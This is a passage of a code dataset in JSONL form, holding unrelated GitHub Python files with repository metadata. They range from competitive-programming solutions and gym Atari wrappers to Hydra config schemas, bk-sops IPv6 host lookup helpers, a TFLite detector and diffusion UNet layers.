cnt=1\n        break\n    if cnt==0:\n        print(x)\n        exit()\n    cnt=0\n    x+=1","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc149/abc149_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30285600311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : lhr (airhenry@gmail.com)\n# @Link : http://about.me/air.henry\n\n\nfrom general import gs\nlog=gs.get_logger(__name__,debug=False)\n\nfrom general.gs import cfg,types\nPortType = types.Integer(1, 65535)\n\nOPTS = [\n    cfg.StrOpt('redis_server',\n               default='localhost',\n               help='redis server to connect to '),\n    cfg.Opt('redis_port',\n            type=PortType,\n            default=6379,\n            help='redis port number to connect to'),\n    cfg.StrOpt('mongo_server',\n               default='localhost',\n               help='mongo server to connect to '),\n    cfg.Opt('mongo_port',\n            type=PortType,\n            default=27017,\n            help='mongo port number to connect to'),\n    ]\n\n\ngs.init(__file__,OPTS)\n\n# log=gs.get_logger(__name__,debug=gs.CONF.debug)\n\nlog.debug(\"gs loaded, root is 
\"+gs.CONF.root_package_name)\n","repo_name":"lhrkkk/general","sub_path":"general/init_gs.py","file_name":"init_gs.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14254706753","text":"import os\nimport pandas as pd\nimport numpy as np\nimport json\nfrom objects import Vertiport, Pad, Aircraft\nfrom copy import deepcopy\n\n\ndef create_vertiport(file_name: str) -> (list, int):\n \"\"\"\n This function creates vertiport objects alongside their pads.\n\n Args:\n file_name (str): vertiport file name that contains its location, pads and number of stands.\n\n Returns:\n vertiport_objects (list): list of built vertiport objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n i = 1\n root_path = os.getcwd() + f\"\\\\{file_name}.xlsx\"\n excel_data = pd.ExcelFile(root_path)\n sheet_names = excel_data.sheet_names\n excel_data = pd.read_excel(root_path, sheet_name=sheet_names[0])\n data_dict = excel_data.to_dict(orient='dict')\n vertiport_objects = []\n vertiport_created = False\n for index in data_dict['Name']:\n if type(data_dict['Name'][index]) == str:\n if vertiport_created:\n vertiport_obj.pads = pads\n vertiport_objects.append(deepcopy(vertiport_obj))\n vertiport_obj = Vertiport(i, [], [], json.loads(data_dict['Position'][index]), data_dict['Name'][index], data_dict['Capacity'][index])\n vertiport_created = True\n pads = []\n i += 1\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n elif np.isnan(data_dict['Name'][index]):\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n vertiport_obj.pads = pads\n # vertiport_obj.aircrafts = aircrafts\n vertiport_objects.append(deepcopy(vertiport_obj))\n last_id = i\n return vertiport_objects, last_id\n\n\ndef create_aircrafts(aircraft_schedule_data: dict, last_id: int) -> (list, int):\n \"\"\"\n This function creates aircraft objects demand_schedule_data\n\n Args:\n aircraft_schedule_data (dict): a dictionary that contains every aircraft's \n arrival time.\n last_id (int): previous last objects id, to be used for creating other objects.\n\n Returns:\n demands (list): list of built aircraft objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n aircrafts = []\n for i in range(len(aircraft_schedule_data['aircraft_start_time'])):\n aircrafts.append(Aircraft(last_id, 'scheduled', [], aircraft_schedule_data['aircraft_start_time'][i]))\n last_id += 1\n return aircrafts, last_id","repo_name":"moahmmadalizade91/max_time_on_vertiport","sub_path":"create_objects.py","file_name":"create_objects.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38916287873","text":"\"\"\"\n Converting individual lives in the game into separate episodes. In\n general, an episode contains all the steps from the beginning of the game\n until the \"Game over\" screen appears?, which can last for thousands of\n game steps (observations and actions). Usually, in arcade games, the\n player is given several lives, which provide several attempts in the\n game. This transformation splits a full episode into individual small\n episodes for every life that a player has. 
Not all games support this\n feature (for example, Pong doesn't), but for the supported environments,\n it usually helps to speed up convergence as our episodes become shorter.\n In the beginning of the game, performing a random amount (up to 30) of\n no-op actions. This should stabilize training, but there is no proper\n explanation why it is the case.\n Making an action decision every K steps, where K is usually 4 or 3. On\n intermediate frames, the chosen action is simply repeated. This allows\n training to speed up significantly, as processing every frame with a\n neural network is quite a demanding operation, but the difference\n between consequent frames is usually minor.\n Taking the maximum of every pixel in the last two frames and using it\n as an observation. Some Atari games have a flickering effect, which is\n due to the platform's limitation (Atari has a limited amount of sprites\n that can be shown on a single frame). For a human eye, such quick\n changes are not visible, but they can confuse neural networks.\n Pressing FIRE in the beginning of the game. Some games (including\n Pong and Breakout) require a user to press the FIRE button to start the\n game. In theory, it's possible for a neural network to learn to press FIRE\n itself, but it will require much more episodes to be played. So, we press\n FIRE in the wrapper.\n Scaling every frame down from 210 × 160, with three color frames, into\n a single-color 84 × 84 image. Different approaches are possible. For\n example, the DeepMind paper describes this transformation as taking\n the Y-color channel from the YCbCr color space and then rescaling the\n full image to an 84 × 84 resolution. Some other researchers do grayscale\n transformation, cropping non-relevant parts of the image and then\n scaling down. In the Baselines repository (and in the following example\n code), the latter approach is used.\n Stacking several (usually four) subsequent frames together to give the\n network the information about the dynamics of the game's objects.\n Clipping the reward to −1, 0, and 1 values. The obtained score can vary\n wildly among the games. For example, in Pong you get a score of 1 for\n every ball that your opponent passes behind you. However, in some\n games, like KungFu, you get a reward of 100 for every enemy killed.\n This spread in reward values makes our loss have completely different\n scales between the games, which makes it harder to find common\n hyperparameters for a set of games. To fix this, reward just gets clipped\n to the range [−1...1].\n Converting observations from unsigned bytes to float32 values. The\n screen obtained from the emulator is encoded as a tensor of bytes with\n values from 0 to 255, which is not the best representation for a neural\n network. 
So, we need to convert the image into floats and rescale the\n values to the range [0.0…1.0].\n\"\"\"\n\nimport cv2\nimport gym\nimport gym.spaces\nimport numpy as np\nimport collections\n\n\nclass FireResetEnv(gym.Wrapper):\n def __init__(self, env=None):\n super(FireResetEnv, self).__init__(env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE'\n assert len(env.unwrapped.get_action_meanings()) >= 3\n\n def step(self, action):\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset()\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset()\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset()\n return obs\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env=None, skip=4):\n \"\"\"\n Return only every skip frame\n :param env:\n :param skip:\n \"\"\"\n super(MaxAndSkipEnv, self).__init__(env)\n self._obs_buffer = collections.deque(maxlen=2)\n self._skip = skip\n\n def step(self, action):\n total_reward = 0.0\n done = None\n info = None\n for _ in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n self._obs_buffer.append(obs)\n total_reward += reward\n if done:\n break\n max_frame = np.max(np.stack(self._obs_buffer), axis=0)\n return max_frame, total_reward, done, info\n\n def _reset(self):\n self._obs_buffer.clear()\n obs = self.env.reset()\n self._obs_buffer.append(obs)\n return obs\n\n\nclass ProcessFrame84(gym.ObservationWrapper):\n \"\"\"\n The goal of this wrapper is to convert input observations from the emulator,\n which normally has a resolution of 210 × 160 pixels with RGB color\n channels, to a grayscale 84 × 84 image. It does this using a colorimetric\n grayscale conversion (which is closer to human color perception than a\n simple averaging of color channels), resizing the image and cropping the top\n and bottom parts of the result.\n \"\"\"\n def __init__(self, env=None):\n super(ProcessFrame84, self).__init__(env)\n self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1),\n dtype=np.uint8)\n\n def observation(self, observation):\n return ProcessFrame84.process(observation)\n\n @staticmethod\n def process(frame):\n if frame.size == 210 * 160 * 3:\n img = np.reshape(frame, (210, 160, 3)).astype(np.float32)\n else:\n assert False, \"Unknown resolution\"\n img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 \\\n + img[:, :, 2] * .114\n resized_screen = cv2.resize(img, (84, 110), interpolation=cv2.INTER_AREA)\n x_t = resized_screen[18:102, :]\n x_t = np.reshape(x_t, [84, 84, 1])\n return x_t.astype(np.uint8)\n\n\nclass BufferWrapper(gym.ObservationWrapper):\n \"\"\"\n This class creates a stack of subsequent frames along the first dimension and\n returns them as an observation. The purpose is to give the network an idea\n about the dynamics of the objects, such as the speed and direction of the ball\n in Pong or how enemies are moving. 
This is very important information,\n which it is not possible to obtain from a single image.\n \"\"\"\n def __init__(self, env, n_steps, dtype=np.float32):\n super(BufferWrapper, self).__init__(env)\n self.dtype = dtype\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n old_space = env.observation_space\n self.observation_space = gym.spaces.Box(old_space.low.repeat(n_steps, axis=0),\n old_space.high.repeat(n_steps, axis=0),\n dtype=dtype)\n\n def reset(self, **kwargs):\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n return self.observation(self.env.reset())\n\n def observation(self, observation):\n self.buffer[:-1] = self.buffer[1:]\n self.buffer[-1] = observation\n return self.buffer\n\n\nclass ImageToPyTorch(gym.ObservationWrapper):\n \"\"\"\n This simple wrapper changes the shape of the observation from HWC to the\n CHW format required by PyTorch. The input shape of the tensor has a color\n channel as the last dimension, but PyTorch's convolution layers assume the\n color channel to be the first dimension.\n\n \"\"\"\n def __init__(self, env):\n super(ImageToPyTorch, self).__init__(env)\n old_shape = self.observation_space.shape\n self.observation_space = gym.spaces.Box(low=0.0,\n high=1.0,\n shape=(old_shape[-1],\n old_shape[0],\n old_shape[1]),\n dtype=np.float32)\n\n def observation(self, observation):\n return np.moveaxis(observation, 2, 0)\n\n\nclass ScaledFloatFrame(gym.ObservationWrapper):\n def observation(self, observation):\n return np.array(observation).astype(np.float32) / 255.0\n\n\ndef make_env(env_name):\n env = gym.make(env_name)\n env = MaxAndSkipEnv(env)\n env = FireResetEnv(env)\n env = ProcessFrame84(env)\n env = ImageToPyTorch(env)\n env = BufferWrapper(env, 4)\n return ScaledFloatFrame(env)","repo_name":"GuyRobot/RL-Python","sub_path":"DeepQLearning/Wrapper.py","file_name":"Wrapper.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10787821259","text":"from hydra.core.config_store import ConfigStore\nfrom omegaconf import MISSING\nfrom pydantic import validator\nfrom pydantic.dataclasses import dataclass\n\n\n@dataclass\nclass DecoderConfig:\n _target_: str = MISSING\n\n\n@dataclass\nclass BPEDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.BPEDecoder\"\n suffix: str = \"\"\n\n\n@dataclass\nclass ByteLevelDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.ByteLevel\"\n\n\n@dataclass\nclass CTCDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.CTC\"\n pad_token: str = \"\"\n word_delimiter_token: str = \"|\"\n cleanup: bool = True\n\n\n@dataclass\nclass MetaspaceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n replacement: str = \"_\"\n add_prefix_space: bool = True\n\n @validator(\"replacement\")\n def validate_replacement(cls, replacement: str) -> str:\n if len(replacement) > 1:\n raise ValueError(f\"len(replacement) must be 1, got: {len(replacement)}\")\n return replacement\n\n\n@dataclass\nclass WordPieceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n prefix: str = \"##\"\n cleanup: bool = True\n\n\ndef setup_config() -> None:\n cs = ConfigStore.instance()\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"bpe_decoder_schema\",\n node=BPEDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"byte_level_decoder_schema\",\n node=ByteLevelDecoderConfig,\n 
)\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"ctc_decoder_schema\",\n node=CTCDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"metaspace_decoder_schema\",\n node=MetaspaceDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"word_piece_decoder_schema\",\n node=WordPieceDecoderConfig,\n )\n","repo_name":"emkademy/cybulde-data-preparation","sub_path":"cybulde/config_schemas/tokenization/decoder_schema.py","file_name":"decoder_schema.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5447816175","text":"from fpdf import FPDF\nimport glob\nfrom pathlib import Path\n\nfiles = glob.glob(\"file/*.txt\")\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\nfor file in files:\n title = Path(file).stem.title()\n pdf.add_page()\n pdf.set_font(family=\"Times\", style=\"B\", size=20)\n pdf.cell(w=150, h=7, txt=title)\n pdf.ln(10)\n with open(file, \"r\") as content:\n content = content.read()\n pdf.set_font(family=\"Times\", size=12)\n pdf.multi_cell(w=180, h=6, txt=content, align=\"J\")\n\npdf.output(\"studpro.pdf\")","repo_name":"muhlisasri/app4-invoice-generation","sub_path":"studentproject/studpro.py","file_name":"studpro.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"113640332","text":"import sys\nsys.setrecursionlimit(10 ** 9)\ninput = sys.stdin.readline\n\ndef DFS(v):\n for i in tree[v]:\n if visited[i] == 0:\n visited[i] = v\n DFS(i)\n\nn = int(input())\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n parent, child = map(int, input().split())\n tree[parent].append(child)\n tree[child].append(parent)\nvisited = [0] * (n + 1)\n\nDFS(1)\nfor parent in visited[2:]:\n print(parent)","repo_name":"cosmos-1885/Algorithm","sub_path":"알고리즘 분류/그래프 탐색/No.11725.py","file_name":"No.11725.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30111772618","text":"import csv\nimport json\n\nwith open(\"C:/Temp/students.json\", \"r\", encoding=\"utf-8\") as fin, \\\n open(\"C:/Temp/students_data.csv\", \"w\", encoding=\"utf-8\", newline=\"\") as fout:\n \n students = json.load(fin)\n flds=[\"name\",\"phone\"]\n data = [dict(zip(flds,[s[flds[0]],s[flds[1]]])) for s in students if s[\"age\"]>=18 and s[\"progress\"]>=75]\n \n writer = csv.DictWriter(fout, fieldnames=flds)\n writer.writeheader()\n writer.writerows(sorted(data, key=lambda x: x[flds[0]]))","repo_name":"vepankin/python_stepik","sub_path":"json_students_data.py","file_name":"json_students_data.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527207627","text":"# -*- coding: utf-8 -*-\nfrom gcloud.conf import settings\nfrom gcloud.utils.ip import get_ip_by_regex, extract_ip_from_ip_str\nfrom pipeline_plugins.base.utils.inject import supplier_account_for_business\nfrom pipeline_plugins.components.collections.sites.open.cc.base import cc_get_host_by_innerip_with_ipv6\nfrom pipeline_plugins.components.collections.sites.open.cc.ipv6_utils import (\n cc_get_host_by_innerip_with_ipv6_across_business,\n)\nfrom pipeline_plugins.components.utils.sites.open.utils import get_biz_ip_from_frontend, get_biz_ip_from_frontend_hybrid\n\n\nclass GetJobTargetServerMixin(object):\n def 
get_target_server_ipv6(self, executor, biz_cc_id, ip_str, logger_handle, data):\n supplier_account = supplier_account_for_business(biz_cc_id)\n logger_handle.info(\"[get_target_server_ipv6] start search this ip:{}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, biz_cc_id, ip_str, supplier_account)\n logger_handle.info(\n \"[get_target_server_ipv6] start search this ip: {} end, result={}\".format(ip_str, host_result)\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n def get_target_server_ipv6_across_business(self, executor, biz_cc_id, ip_str, logger_handle, data):\n \"\"\"\n step 1: 去本业务查这些ip,得到两个列表,本业务查询到的host, 本业务查不到的ip列表\n step 2: 对于本业务查不到的host, 去全业务查询,查不到的话则报错,将查到的host_id 与 本业务的 host_id 进行合并\n \"\"\"\n logger_handle.info(\"[get_target_server_ipv6_across_business] start search ip, ip_str={}\".format(ip_str))\n supplier_account = supplier_account_for_business(biz_cc_id)\n # 去本业务查\n try:\n (\n host_list,\n ipv4_not_find_list,\n ipv4_with_cloud_not_find_list,\n ipv6_not_find_list,\n ipv6_with_cloud_not_find_list,\n ) = cc_get_host_by_innerip_with_ipv6_across_business(executor, biz_cc_id, ip_str, supplier_account)\n except Exception as e:\n logger_handle.exception(\n f\"[get_target_server_ipv6_across_business] call \"\n f\"cc_get_host_by_innerip_with_ipv6_across_business error: {e}\"\n )\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确:{}\".format(e)\n return False, {}\n\n ip_not_find_str = \",\".join(\n ipv4_not_find_list + ipv6_not_find_list + ipv4_with_cloud_not_find_list + ipv6_with_cloud_not_find_list\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] not find this ip, ip_not_find_str={}\".format(ip_not_find_str)\n )\n # 剩下的ip去全业务查\n host_result = cc_get_host_by_innerip_with_ipv6(\n executor, None, ip_not_find_str, supplier_account, is_biz_set=True\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] start search this ip:{}, result:{}\".format(\n ip_not_find_str, host_list\n )\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n host_data = host_result[\"data\"] + host_list\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_data]}\n\n def get_target_server(\n self,\n executor,\n biz_cc_id,\n data,\n ip_str,\n logger_handle,\n ip_is_exist=False,\n is_across=False,\n ignore_ex_data=False,\n ):\n if settings.ENABLE_IPV6:\n if is_across:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n return self.get_target_server_ipv6(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = get_biz_ip_from_frontend(\n ip_str,\n executor,\n biz_cc_id,\n data,\n logger_handle=logger_handle,\n is_across=is_across,\n ip_is_exist=ip_is_exist,\n ignore_ex_data=ignore_ex_data,\n )\n if not clean_result:\n return False, {}\n\n return True, {\"ip_list\": ip_list}\n\n def get_target_server_hybrid(self, executor, biz_cc_id, data, ip_str, logger_handle):\n if settings.ENABLE_IPV6:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = get_biz_ip_from_frontend_hybrid(executor, ip_str, biz_cc_id, data)\n if not clean_result:\n return False, {}\n\n return True, 
{\"ip_list\": ip_list}\n\n def get_target_server_biz_set(\n self, executor, ip_table, supplier_account, logger_handle, ip_key=\"ip\", need_build_ip=True\n ):\n def build_ip_str_from_table():\n ip_list = []\n # 第二步 分析表格, 得到 ipv6, host_id,ipv4, 三种字符串,并连接成字符串\n for _ip in ip_table:\n ipv6_list, ipv4_list, host_id_list, *_ = extract_ip_from_ip_str(_ip[ip_key]) # noqa\n host_id_list = [str(host_id) for host_id in host_id_list]\n ip_list.extend(\n [\n *[\"{}:[{}]\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv6_list],\n *host_id_list,\n *[\"{}:{}\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv4_list],\n ]\n )\n return \",\".join(ip_list)\n\n if settings.ENABLE_IPV6:\n # 第一步 查询这个业务集下所有的业务id, 得到bk_biz_ids\n ip_str = ip_table\n # 在业务集的执行方案中,可能不需要额外处理ip,这种情况直接透传就好\n if need_build_ip:\n ip_str = build_ip_str_from_table()\n logger_handle.info(\"[get_target_server_biz_set] build ip_str, ip_str is {}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, None, ip_str, supplier_account, is_biz_set=True)\n logger_handle.info(\"[get_target_server_biz_set] search ip end, host_result is {}\".format(host_result))\n if not host_result[\"result\"]:\n return False, {}\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n # 拼装ip_list, bk_cloud_id为空则值为0\n ip_list = [\n {\"ip\": ip, \"bk_cloud_id\": int(_ip[\"bk_cloud_id\"]) if str(_ip[\"bk_cloud_id\"]) else 0}\n for _ip in ip_table\n for ip in get_ip_by_regex(_ip[ip_key])\n ]\n\n return True, {\"ip_list\": ip_list}\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/collections/sites/open/job/ipv6_base.py","file_name":"ipv6_base.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"70139779690","text":"from conf import PROJECT_ROOT_DIR\nimport os\nimport pandas as pd\nimport numpy as np\nimport re\n\nfrom git_status import get_repo_list\n\n\ndef get_wiki_status_color(input_text):\n if input_text is None or input_text == 'inactive':\n result_text = \":heavy_multiplication_x:\"\n else:\n result_text = \":heavy_check_mark:\"\n return '{}'.format(result_text)\n\n\ndef get_wiki_rating(input_rating):\n result_text = ''\n if input_rating is not None and not np.isnan(input_rating):\n rating = int(input_rating)\n result_text = ':star:x{}'.format(rating)\n return '{}'.format(result_text)\n\n\ndef generate_wiki_per_category(output_path, update_readme: bool = True):\n \"\"\"\n\n :param update_readme:\n :param output_path:\n \"\"\"\n repo_df = get_repo_list()\n for category in repo_df['category'].unique():\n category_df = repo_df[repo_df['category'] == category].copy()\n url_md_list = []\n for idx, irow in category_df[['name', 'url']].iterrows():\n url_md_list.append('[{}]({})'.format(irow['name'], irow['url']))\n\n formatted_df = pd.DataFrame({\n 'repo': url_md_list,\n 'comment': category_df['comment'].apply(lambda x: '{}'.format(x)),\n 'created_at': category_df['created_at'].apply(lambda x: '{}'.format(x)),\n 'last_commit': category_df['last_commit'].apply(lambda x: '{}'.format(x)),\n 'star_count': category_df['star_count'].apply(lambda x: '{}'.format(x)),\n 'repo_status': category_df['repo_status'],\n 'rating': category_df['rating']\n })\n # add color for the status\n formatted_df = formatted_df.sort_values(by=['rating', 'star_count'], ascending=False).reset_index(drop=True)\n formatted_df['repo_status'] = formatted_df['repo_status'].apply(lambda x: 
get_wiki_status_color(x))\n formatted_df['rating'] = formatted_df['rating'].apply(lambda x: get_wiki_rating(x))\n formatted_df.columns = ['{}'.format(x) for x in formatted_df.columns]\n\n clean_category_name = category.lower().replace(' ', '_')\n output_path_full = os.path.join(output_path, '{}.md'.format(clean_category_name))\n with open(output_path_full, 'w') as f:\n f.write(formatted_df.to_markdown(index=False))\n print('wiki generated in [{}]'.format(output_path_full))\n\n if update_readme:\n check_str = '[PLACEHOLDER_START:{}]'.format(clean_category_name)\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md')) as f:\n all_read_me = f.read()\n if check_str not in all_read_me:\n print(f'section {check_str} not found')\n continue\n\n # only display top 5, then expandable for extra 5\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md'), 'w') as f:\n\n table_str = formatted_df.iloc[:15].to_markdown(index=False)\n new_str = f\" \\n\"\n new_str += table_str\n new_str += f\"\"\n\n search_start = re.escape(''.format(clean_category_name))\n search_end = re.escape(''.format(clean_category_name))\n pattern_s = re.compile(r'{}.*?{}'.format(search_start, search_end), re.DOTALL)\n write_str = re.sub(pattern_s, new_str, all_read_me)\n f.write(write_str)\n\n\nif __name__ == '__main__':\n local_path = os.path.join(PROJECT_ROOT_DIR, 'generated_wiki')\n generate_wiki_per_category(local_path)\n","repo_name":"firmai/financial-machine-learning","sub_path":"wiki_gen.py","file_name":"wiki_gen.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":5070,"dataset":"github-code","pt":"53"} +{"seq_id":"622273703","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\n\nfrom object_detector_detection_api import ObjectDetectorDetectionAPI, \\\n PATH_TO_LABELS, NUM_CLASSES\n\n\nclass ObjectDetectorLite(ObjectDetectorDetectionAPI):\n def __init__(self, model_path='converted_shopmodel3.tflite'):\n \"\"\"\n Builds Tensorflow graph, load model and labels\n \"\"\"\n\n # Load lebel_map\n self._load_label(PATH_TO_LABELS, NUM_CLASSES, use_disp_name=True)\n\n # Define lite graph and Load Tensorflow Lite model into memory\n self.interpreter = tf.lite.Interpreter(\n model_path=model_path)\n self.interpreter.allocate_tensors()\n self.input_details = self.interpreter.get_input_details()\n self.output_details = self.interpreter.get_output_details()\n\n def detect(self, image, threshold=0.1):\n \"\"\"\n Predicts person in frame with threshold level of confidence\n Returns list with top-left, bottom-right coordinates and list with labels, confidence in %\n \"\"\"\n\n # Resize and normalize image for network input\n frame = cv2.resize(image, (64, 64))\n frame = np.expand_dims(frame, axis=0)\n frame = (2.0 / 255.0) * frame - 1.0\n frame = frame.astype('float32')\n\n # run model\n self.interpreter.set_tensor(self.input_details[0]['index'], frame)\n self.interpreter.invoke()\n\n # get results\n boxes = self.interpreter.get_tensor(\n self.output_details[0]['index'])\n print(boxes)\n classes = self.interpreter.get_tensor(\n self.output_details[1]['index'])\n scores = self.interpreter.get_tensor(\n self.output_details[2]['index'])\n num = self.interpreter.get_tensor(\n self.output_details[3]['index'])\n\n # Find detected boxes coordinates\n return self._boxes_coordinates(image,\n np.squeeze(boxes[0]),\n np.squeeze(classes[0]+1).astype(np.int32),\n np.squeeze(scores[0]),\n min_score_thresh=threshold)\n\n def close(self):\n pass\n\n\nif __name__ == '__main__':\n detector = 
ObjectDetectorLite()\n\n image = cv2.cvtColor(cv2.imread('dog.jpg'), cv2.COLOR_BGR2RGB)\n\n result = detector.detect(image, 0.4)\n print(result)\n\n for obj in result:\n print('coordinates: {} {}. class: \"{}\". confidence: {:.2f}'.\n format(obj[0], obj[1], obj[3], obj[2]))\n\n cv2.rectangle(image, obj[0], obj[1], (0, 255, 0), 2)\n cv2.putText(image, '{}: {:.2f}'.format(obj[3], obj[2]),\n (obj[0][0], obj[0][1] - 5),\n cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 2)\n\n cv2.imwrite('r1.jpg', cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\n detector.close()\n","repo_name":"Pixel-Pi/CVProject","sub_path":"mobile_detector/object_detector_detection_api_lite.py","file_name":"object_detector_detection_api_lite.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12168140958","text":"import math\nimport torch\nfrom torch import nn\n\nclass Block(nn.Module):\n def __init__(self, in_ch, out_ch, time_emb_dim, up=False):\n super().__init__()\n self.time_mlp = nn.Linear(time_emb_dim, out_ch)\n if up:\n self.conv1 = nn.Conv2d(2 * in_ch, out_ch, 3, padding=1)\n self.transform = nn.ConvTranspose2d(out_ch, out_ch, 4, 2, 1)\n else:\n self.conv1 = nn.Conv2d(in_ch, out_ch, 3, padding=1)\n self.transform = nn.Conv2d(out_ch, out_ch, 4, 2, 1)\n self.conv2 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bnorm1 = nn.BatchNorm2d(out_ch)\n self.bnorm2 = nn.BatchNorm2d(out_ch)\n self.relu = nn.ReLU()\n\n def forward(self, x, t):\n h = self.bnorm1(self.relu(self.conv1(x)))\n time_emb = self.relu(self.time_mlp(t))\n time_emb = time_emb[(...,) + (None,) * 2]\n h = h + time_emb\n h = self.bnorm2(self.relu(self.conv2(h)))\n return self.transform(h)\n\n\nclass SinusoidalPositionEmbeddings(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, time):\n device = time.device\n half_dim = self.dim // 2\n embeddings = math.log(10000) / (half_dim - 1)\n embeddings = torch.exp(torch.arange(half_dim, device=device) * -embeddings)\n embeddings = time[:, None] * embeddings[None, :]\n embeddings = torch.cat((embeddings.sin(), embeddings.cos()), dim=-1)\n # TODO: Double check the ordering here\n return embeddings\n\n\nclass SimpleUnet(nn.Module):\n def __init__(self):\n super().__init__()\n image_channels = 3\n down_channels = (64, 128, 256, 512, 1024)\n up_channels = (1024, 512, 256, 128, 64)\n out_dim = 3\n time_emb_dim = 32\n\n self.time_mlp = nn.Sequential(\n SinusoidalPositionEmbeddings(time_emb_dim),\n nn.Linear(time_emb_dim, time_emb_dim),\n nn.ReLU(),\n )\n self.conv0 = nn.Conv2d(image_channels, down_channels[0], 3, padding=1)\n self.downs = nn.ModuleList(\n [\n Block(down_channels[i], down_channels[i + 1], time_emb_dim)\n for i in range(len(down_channels) - 1)\n ]\n )\n self.ups = nn.ModuleList(\n [\n Block(up_channels[i], up_channels[i + 1], time_emb_dim, up=True)\n for i in range(len(up_channels) - 1)\n ]\n )\n self.output = nn.Conv2d(up_channels[-1], out_dim, 1)\n\n def forward(self, x, timestep):\n t = self.time_mlp(timestep)\n x = self.conv0(x)\n residual_inputs = []\n for down in self.downs:\n x = down(x, t)\n residual_inputs.append(x)\n for up in self.ups:\n residual_x = residual_inputs.pop()\n x = torch.cat((x, residual_x), dim=1)\n x = up(x, t)\n return self.output(x)\n\n\nclass UNet(nn.Module):\n def __init__(self, in_channels=1, out_channels=1):\n 